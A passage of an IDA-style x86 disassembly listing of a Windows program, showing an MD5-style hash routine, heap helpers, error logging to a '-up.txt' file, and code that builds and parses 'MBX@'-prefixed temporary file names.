not eax
or eax, edx
xor eax, ecx
add eax, [ebp+var_18]
lea eax, [edi+eax-546BDC59h]
mov edi, eax
shr edi, 11h
shl eax, 0Fh
or edi, eax
mov eax, ecx
add edi, edx
push 85845DD1h
not eax
or eax, edi
push 15h
xor eax, edx
push [ebp+var_4C]
add eax, [ebp+var_3C]
lea ebx, [ebx+eax-36C5FC7h]
mov eax, ebx
shl eax, 15h
shr ebx, 0Bh
or eax, ebx
mov ebx, edx
add eax, edi
not ebx
or ebx, eax
mov [ebp+var_8], eax
xor ebx, edi
add ebx, [ebp+var_20]
lea ecx, [ecx+ebx+655B59C3h]
mov ebx, ecx
shr ebx, 1Ah
shl ecx, 6
or ebx, ecx
mov ecx, edi
add ebx, eax
not ecx
or ecx, ebx
push ebx
xor ecx, eax
mov [ebp+var_4], ebx
add ecx, [ebp+var_44]
not eax
lea edx, [edx+ecx-70F3336Eh]
mov ecx, edx
shr ecx, 16h
shl edx, 0Ah
or ecx, edx
add ecx, ebx
or eax, ecx
push ecx
xor eax, ebx
mov [ebp+var_10], ecx
add eax, [ebp+var_28]
lea eax, [edi+eax-100B83h]
mov edx, eax
shr edx, 11h
shl eax, 0Fh
or edx, eax
lea eax, [ebp+var_8]
add edx, ecx
push edx
push eax
mov [ebp+var_C], edx
call sub_499280
push 6FA87E4Fh
push 6
push [ebp+var_30]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_499280
push 0FE2CE6E0h
push 0Ah
push [ebp+var_14]
lea eax, [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_499280
add esp, 54h
push 0A3014314h
push 0Fh
push [ebp+var_38]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_499280
push 4E0811A1h
push 15h
push [ebp+var_1C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_499280
push 0F7537E82h
push 6
push [ebp+var_40]
lea eax, [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push [ebp+var_8]
push eax
call sub_499280
add esp, 54h
lea eax, [ebp+var_10]
push 0BD3AF235h
push 0Ah
push [ebp+var_24]
push [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push eax
call sub_499280
push 2AD7D2BBh
push 0Fh
push [ebp+var_48]
lea eax, [ebp+var_C]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push eax
call sub_499280
push 0EB86D391h
push 15h
push [ebp+var_2C]
lea eax, [ebp+var_8]
push [ebp+var_4]
push [ebp+var_10]
push [ebp+var_C]
push eax
call sub_499280
mov eax, [ebp+var_4]
add esp, 54h
add [esi], eax
mov eax, [ebp+var_8]
add [esi+4], eax
mov eax, [ebp+var_C]
add [esi+8], eax
mov eax, [ebp+var_10]
add [esi+0Ch], eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4989D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499280 proc near ; CODE XREF: sub_4989D8+79C�p
; sub_4989D8+7B8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
mov edx, [ebp+arg_0]
not eax
or eax, [ebp+arg_4]
push esi
push 20h
xor eax, [ebp+arg_8]
pop ecx
sub ecx, [ebp+arg_14]
add eax, [edx]
add eax, [ebp+arg_10]
add eax, [ebp+arg_18]
mov esi, eax
shr esi, cl
mov ecx, [ebp+arg_14]
shl eax, cl
or esi, eax
add esi, [ebp+arg_4]
mov [edx], esi
pop esi
pop ebp
retn
sub_499280 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4992B3 proc near ; CODE XREF: sub_49885D+F2�p
; sub_49885D+12D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_4992F6
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_4]
push esi
or esi, 0FFFFFFFFh
lea eax, [edx+1]
sub esi, edx
loc_4992CB: ; CODE XREF: sub_4992B3+40�j
mov dl, [ecx]
mov [eax-1], dl
mov edx, [ecx]
shr edx, 8
mov [eax], dl
mov edx, [ecx]
shr edx, 10h
mov [eax+1], dl
mov edx, [ecx]
shr edx, 18h
mov [eax+2], dl
add eax, 4
add ecx, 4
lea edx, [esi+eax]
cmp edx, [ebp+arg_8]
jb short loc_4992CB
pop esi
loc_4992F6: ; CODE XREF: sub_4992B3+7�j
pop ebp
retn 0Ch
sub_4992B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4992FA proc near ; CODE XREF: sub_4989D8+2B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jbe short loc_49933E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push esi
push edi
push 0FFFFFFFEh
lea eax, [edx+2]
pop esi
sub esi, edx
loc_499313: ; CODE XREF: sub_4992FA+40�j
movzx edi, byte ptr [eax-1]
xor edx, edx
mov dh, [eax+1]
mov dl, [eax]
add eax, 4
shl edx, 8
or edx, edi
movzx edi, byte ptr [eax-6]
shl edx, 8
or edx, edi
mov [ecx], edx
lea edx, [esi+eax]
add ecx, 4
cmp edx, [ebp+arg_8]
jb short loc_499313
pop edi
pop esi
loc_49933E: ; CODE XREF: sub_4992FA+7�j
pop ebp
retn 0Ch
sub_4992FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499342 proc near ; CODE XREF: _4:0048FC71�p _4:0048FC92�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
push 0
push [ebp+var_4]
call ds:dword_4A2778 ; RaiseException
leave
retn
sub_499342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49935A proc near ; CODE XREF: sub_48E2E0+3C8�p
; _4:0048FE70�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
call sub_499397
mov [ebp+var_8], eax
cmp [ebp+arg_0], 0
jnz short loc_499371
xor eax, eax
jmp short locret_499395
; ---------------------------------------------------------------------------
loc_499371: ; CODE XREF: sub_49935A+11�j
push [ebp+arg_0]
push 8
push [ebp+var_8]
call ds:dword_4A2740 ; RtlAllocateHeap
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_499392
mov ecx, 0EF000009h
call sub_499342
loc_499392: ; CODE XREF: sub_49935A+2C�j
mov eax, [ebp+var_4]
locret_499395: ; CODE XREF: sub_49935A+15�j
leave
retn
sub_49935A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499397 proc near ; CODE XREF: sub_49935A+5�p
; sub_4993DD:loc_4993E9�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4A2A44, 0
jnz short loc_4993C0
push 0
push 10000h
push 0
call ds:dword_4A2748 ; HeapCreate
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4A2A44, eax
jmp short loc_4993C8
; ---------------------------------------------------------------------------
loc_4993C0: ; CODE XREF: sub_499397+B�j
mov eax, ds:dword_4A2A44
mov [ebp+var_4], eax
loc_4993C8: ; CODE XREF: sub_499397+27�j
cmp [ebp+var_4], 0
jnz short loc_4993D8
mov ecx, 0EF00000Dh
call sub_499342
loc_4993D8: ; CODE XREF: sub_499397+35�j
mov eax, [ebp+var_4]
leave
retn
sub_499397 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4993DD proc near ; CODE XREF: _4:0048F1FE�p
; sub_49000C+10�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_4993E9
jmp short locret_4993FF
; ---------------------------------------------------------------------------
loc_4993E9: ; CODE XREF: sub_4993DD+8�j
call sub_499397
mov [ebp+var_4], eax
push [ebp+arg_0]
push 0
push [ebp+var_4]
call ds:dword_4A2744 ; RtlFreeHeap
locret_4993FF: ; CODE XREF: sub_4993DD+A�j
leave
retn
sub_4993DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499401 proc near ; CODE XREF: sub_49948C+64�p
; sub_4994F7+3A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
push 0
push 0
call ds:dword_4A27C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_49F4F4
push [ebp+var_4]
push 0
call ds:dword_4A27D0 ; MessageBoxA
push 0
call ds:dword_4A26E4 ; GetCurrentProcess
push eax
call ds:dword_4A2798 ; TerminateProcess
leave
retn
sub_499401 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499436 proc near ; CODE XREF: sub_49948C+52�p
; sub_49948C+5C�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F500
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_1C], ecx
and [ebp+var_4], 0
push [ebp+var_1C]
call sub_499538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49947D
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_49947D: ; CODE XREF: sub_499436+3A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_499436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49948C proc near ; CODE XREF: sub_490036+C4�p
; sub_49094C+CD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push offset dword_4A2A28
call ds:dword_4A26C4 ; RtlEnterCriticalSection
mov [ebp+var_8], offset dword_4A2A48
push [ebp+arg_4]
push [ebp+arg_0]
push offset aErrorAtSDReaso ; "Error at %s:%d\n\nReason: "
push [ebp+var_8]
call ds:dword_4A27D4 ; wsprintfA
add esp, 10h
mov [ebp+var_C], eax
lea eax, [ebp+arg_C]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
push eax
call ds:dword_4A27D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_499436
mov ecx, offset asc_4A1D5C ; "\n"
call sub_499436
mov ecx, [ebp+var_8]
call sub_499401
leave
retn
sub_49948C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4994F7 proc near ; CODE XREF: sub_495AB0+128�p
; sub_49EAB0+8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], offset dword_4A2A48
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_4A27D8 ; wvsprintfA
and [ebp+var_4], 0
mov ecx, [ebp+var_8]
call sub_499436
mov ecx, offset asc_4A1D5C ; "\n"
call sub_499436
mov ecx, [ebp+var_8]
call sub_499401
leave
retn
sub_4994F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499538 proc near ; CODE XREF: sub_499436+30�p
; sub_499726+74�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F510
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
push offset dword_4A2A28
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, offset dword_48E720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_4996AD
push 400h
call sub_49935A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_1C], eax
push 0
call ds:dword_4A2718 ; GetModuleHandleA
mov ecx, offset dword_48E720
mov ecx, [ecx+4]
mov [ecx+7Ch], eax
mov eax, offset dword_48E720
mov eax, [eax+4]
cmp dword ptr [eax+7Ch], 0
jnz short loc_4995C2
jmp loc_4996F6
; ---------------------------------------------------------------------------
loc_4995C2: ; CODE XREF: sub_499538+83�j
push 400h
push [ebp+var_1C]
mov eax, offset dword_48E720
mov eax, [eax+4]
push dword ptr [eax+7Ch]
call ds:dword_4A2714 ; GetModuleFileNameA
test eax, eax
jnz short loc_4995E4
jmp loc_4996F6
; ---------------------------------------------------------------------------
loc_4995E4: ; CODE XREF: sub_499538+A5�j
mov edi, [ebp+var_1C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_24], ecx
push offset aUp_txt ; "-up.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4A27D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_4A26A8 ; CreateFileA
mov ecx, offset dword_48E720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_48E720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_499648
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_499690
loc_499648: ; CODE XREF: sub_499538+108�j
push offset aUp1_txt ; "-up1.txt"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4A27D4 ; wsprintfA
pop ecx
pop ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push [ebp+var_1C]
call ds:dword_4A26A8 ; CreateFileA
mov ecx, offset dword_48E720
mov ecx, [ecx+4]
mov [ecx+78h], eax
mov eax, offset dword_48E720
mov eax, [eax+4]
mov eax, [eax+78h]
mov [ebp+var_20], eax
loc_499690: ; CODE XREF: sub_499538+10E�j
cmp [ebp+var_20], 0
jz short loc_49969C
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_49969E
loc_49969C: ; CODE XREF: sub_499538+15C�j
jmp short loc_4996F6
; ---------------------------------------------------------------------------
loc_49969E: ; CODE XREF: sub_499538+162�j
push 2
push 0
push 0
push [ebp+var_20]
call ds:dword_4A2788 ; SetFilePointer
loc_4996AD: ; CODE XREF: sub_499538+4A�j
cmp [ebp+var_20], 0FFFFFFFFh
jz short loc_4996E7
push 0
lea eax, [ebp+var_28]
push eax
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+arg_0]
push [ebp+var_20]
call ds:dword_4A27BC ; WriteFile
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+var_28], ecx
jz short loc_4996E7
jmp short loc_4996F6
; ---------------------------------------------------------------------------
loc_4996E7: ; CODE XREF: sub_499538+179�j
; sub_499538+1AB�j ...
push 0FFFFFFFFh
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
jmp short loc_499717
; ---------------------------------------------------------------------------
loc_4996F6: ; CODE XREF: sub_499538+85�j
; sub_499538+A7�j ...
and [ebp+var_2C], 0
jmp short loc_4996E7
; ---------------------------------------------------------------------------
loc_4996FC: ; DATA XREF: _5:0049F518�o
push offset dword_4A2A28
call ds:dword_4A2754 ; RtlLeaveCriticalSection
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
loc_499717: ; CODE XREF: sub_499538+1BC�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_499538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499726 proc near ; CODE XREF: sub_491C5C+345�p
; sub_499C27+1D�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
; FUNCTION CHUNK AT 004997BB SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F520
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 1000h
call sub_49935A
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_1C], eax
lea eax, [ebp+arg_4]
mov [ebp+var_20], eax
push [ebp+var_20]
push [ebp+arg_0]
push [ebp+var_1C]
call ds:dword_4A27D8 ; wvsprintfA
mov [ebp+var_24], eax
push offset asc_4A1D90 ; "\r\n"
mov eax, [ebp+var_1C]
add eax, [ebp+var_24]
push eax
call ds:dword_4A27D4 ; wsprintfA
pop ecx
pop ecx
and [ebp+var_20], 0
push [ebp+var_1C]
call sub_499538
pop ecx
or [ebp+var_4], 0FFFFFFFFh
call sub_4997AB
jmp short loc_4997BB
sub_499726 endp
; =============== S U B R O U T I N E =======================================
sub_4997AB proc near ; CODE XREF: sub_499726+7E�p
; DATA XREF: _5:0049F528�o
mov eax, [ebp-1Ch]
mov [ebp-2Ch], eax
push dword ptr [ebp-2Ch]
call sub_4993DD
pop ecx
retn
sub_4997AB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_499726
loc_4997BB: ; CODE XREF: sub_499726+83�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_499726
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4997CA proc near ; CODE XREF: sub_4971E1+D39�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00499883 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F530
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 1000h
call sub_49935A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
push 0
push 0
lea eax, [ebp+var_20]
push eax
push 400h
call ds:dword_4A2710 ; RtlGetLastWin32Error
push eax
push 0
push 1300h
call ds:dword_4A26DC ; FormatMessageA
cmp [ebp+var_20], 0
jz short loc_499859
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_20]
push offset aWindowsErrorSA ; "windows error %s\n at %s(%d)\n"
push [ebp+var_1C]
call ds:dword_4A27D4 ; wsprintfA
add esp, 14h
push [ebp+var_1C]
call sub_499538
pop ecx
loc_499859: ; CODE XREF: sub_4997CA+6A�j
or [ebp+var_4], 0FFFFFFFFh
call sub_499864
jmp short loc_499883
sub_4997CA endp
; =============== S U B R O U T I N E =======================================
sub_499864 proc near ; CODE XREF: sub_4997CA+93�p
; DATA XREF: _5:0049F538�o
cmp dword ptr [ebp-20h], 0
jz short loc_499873
push dword ptr [ebp-20h]
call ds:dword_4A2764 ; LocalFree
loc_499873: ; CODE XREF: sub_499864+4�j
mov eax, [ebp-1Ch]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4993DD
pop ecx
retn
sub_499864 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4997CA
loc_499883: ; CODE XREF: sub_4997CA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4997CA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499892 proc near ; CODE XREF: sub_4968CF+A2�p
; sub_4971E1+1F4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
movzx eax, ds:byte_4A2A40
and eax, 1
test eax, eax
jnz short loc_4998BE
mov al, ds:byte_4A2A40
or al, 1
mov ds:byte_4A2A40, al
call ds:dword_4A26E8 ; GetCurrentProcessId
mov ds:dword_4A2A20, eax
loc_4998BE: ; CODE XREF: sub_499892+13�j
cmp [ebp+arg_8], 0
jnz short loc_4998CE
mov eax, ds:dword_4A2A20
mov [ebp+var_10], eax
jmp short loc_4998D4
; ---------------------------------------------------------------------------
loc_4998CE: ; CODE XREF: sub_499892+30�j
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
loc_4998D4: ; CODE XREF: sub_499892+3A�j
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
push 124h
call sub_49935A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
push 49h
pop ecx
xor eax, eax
mov edi, [ebp+var_4]
rep stosd
push [ebp+var_4]
push 104h
call ds:dword_4A2734 ; GetTempPathA
movzx eax, [ebp+arg_4]
test eax, eax
jz short loc_499948
mov eax, ds:dword_4A6A48
inc eax
mov ds:dword_4A6A48, eax
push ds:dword_4A6A48
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X@X_ ; "MBX@%X@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4A27D4 ; wsprintfA
add esp, 14h
jmp short loc_49999B
; ---------------------------------------------------------------------------
loc_499948: ; CODE XREF: sub_499892+7A�j
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_499977
push [ebp+arg_0]
push [ebp+var_8]
push offset aMbx@X@X_ ; "MBX@%X@%X.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4A27D4 ; wsprintfA
add esp, 10h
jmp short loc_49999B
; ---------------------------------------------------------------------------
loc_499977: ; CODE XREF: sub_499892+BA�j
push [ebp+var_8]
push offset aMbx@X@_ ; "MBX@%X@*.###"
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_4]
add eax, ecx
push eax
call ds:dword_4A27D4 ; wsprintfA
add esp, 0Ch
loc_49999B: ; CODE XREF: sub_499892+B4�j
; sub_499892+E3�j
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_4]
call ds:dword_4A27C8 ; CharUpperBuffA
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_499892 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4999B8 proc near ; CODE XREF: sub_499A16+E1�p
; sub_499A16+150�p
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
movzx eax, [ebp+arg_0]
cmp eax, 30h
jl short loc_4999D6
movzx eax, [ebp+arg_0]
cmp eax, 39h
jg short loc_4999D6
movzx eax, [ebp+arg_0]
sub eax, 30h
jmp short loc_499A14
; ---------------------------------------------------------------------------
loc_4999D6: ; CODE XREF: sub_4999B8+A�j
; sub_4999B8+13�j
movzx eax, [ebp+arg_0]
cmp eax, 41h
jl short loc_4999F1
movzx eax, [ebp+arg_0]
cmp eax, 46h
jg short loc_4999F1
movzx eax, [ebp+arg_0]
sub eax, 37h
jmp short loc_499A14
; ---------------------------------------------------------------------------
loc_4999F1: ; CODE XREF: sub_4999B8+25�j
; sub_4999B8+2E�j
movzx eax, [ebp+arg_0]
cmp eax, 61h
jl short loc_499A0C
movzx eax, [ebp+arg_0]
cmp eax, 66h
jg short loc_499A0C
movzx eax, [ebp+arg_0]
sub eax, 57h
jmp short loc_499A14
; ---------------------------------------------------------------------------
loc_499A0C: ; CODE XREF: sub_4999B8+40�j
; sub_4999B8+49�j
mov eax, [ebp+arg_4]
mov byte ptr [eax], 1
xor eax, eax
loc_499A14: ; CODE XREF: sub_4999B8+1C�j
; sub_4999B8+37�j ...
pop ebp
retn
sub_4999B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_499A16 proc near ; CODE XREF: sub_49253F+2DE�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F540
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 40h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
cmp [ebp+arg_0], 0
jz loc_499BF5
call ds:dword_4A26E8 ; GetCurrentProcessId
mov [ebp+var_1C], eax
push 5Ch
push [ebp+arg_0]
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_499A71
mov eax, [ebp+var_24]
inc eax
mov [ebp+arg_0], eax
loc_499A71: ; CODE XREF: sub_499A16+52�j
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_20], ecx
cmp [ebp+var_20], 4
jle loc_499BF5
push 4
pop ecx
mov edi, offset aMbx@ ; "MBX@"
mov esi, [ebp+arg_0]
xor eax, eax
mov [ebp+var_34], eax
repe cmpsb
jz short loc_499AA7
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_34], eax
loc_499AA7: ; CODE XREF: sub_499A16+87�j
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
cmp [ebp+var_38], 0
jnz loc_499BF5
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
push 40h
push [ebp+arg_0]
call sub_48D640
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_499BF5
and [ebp+var_30], 0
and [ebp+var_2C], 0
loc_499AE1: ; CODE XREF: sub_499A16+FC�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_3C], al
push [ebp+var_3C]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_4999B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_499AE1
movzx eax, [ebp+var_2C]
test eax, eax
jnz loc_499BF5
mov eax, [ebp+var_30]
cmp eax, [ebp+var_1C]
jnz loc_499BF5
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push 2Eh
push [ebp+arg_0]
call sub_48D640
pop ecx
pop ecx
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_499BF5
and [ebp+var_30], 0
loc_499B50: ; CODE XREF: sub_499A16+16B�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_40], al
push [ebp+var_40]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_4999B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_499B50
movzx eax, [ebp+var_2C]
test eax, eax
jnz short loc_499BF5
mov [ebp+var_44], offset a__0 ; ".###"
mov eax, [ebp+arg_0]
mov [ebp+var_48], eax
loc_499B98: ; CODE XREF: sub_499A16+1B4�j
mov eax, [ebp+var_48]
mov al, [eax]
mov [ebp+var_49], al
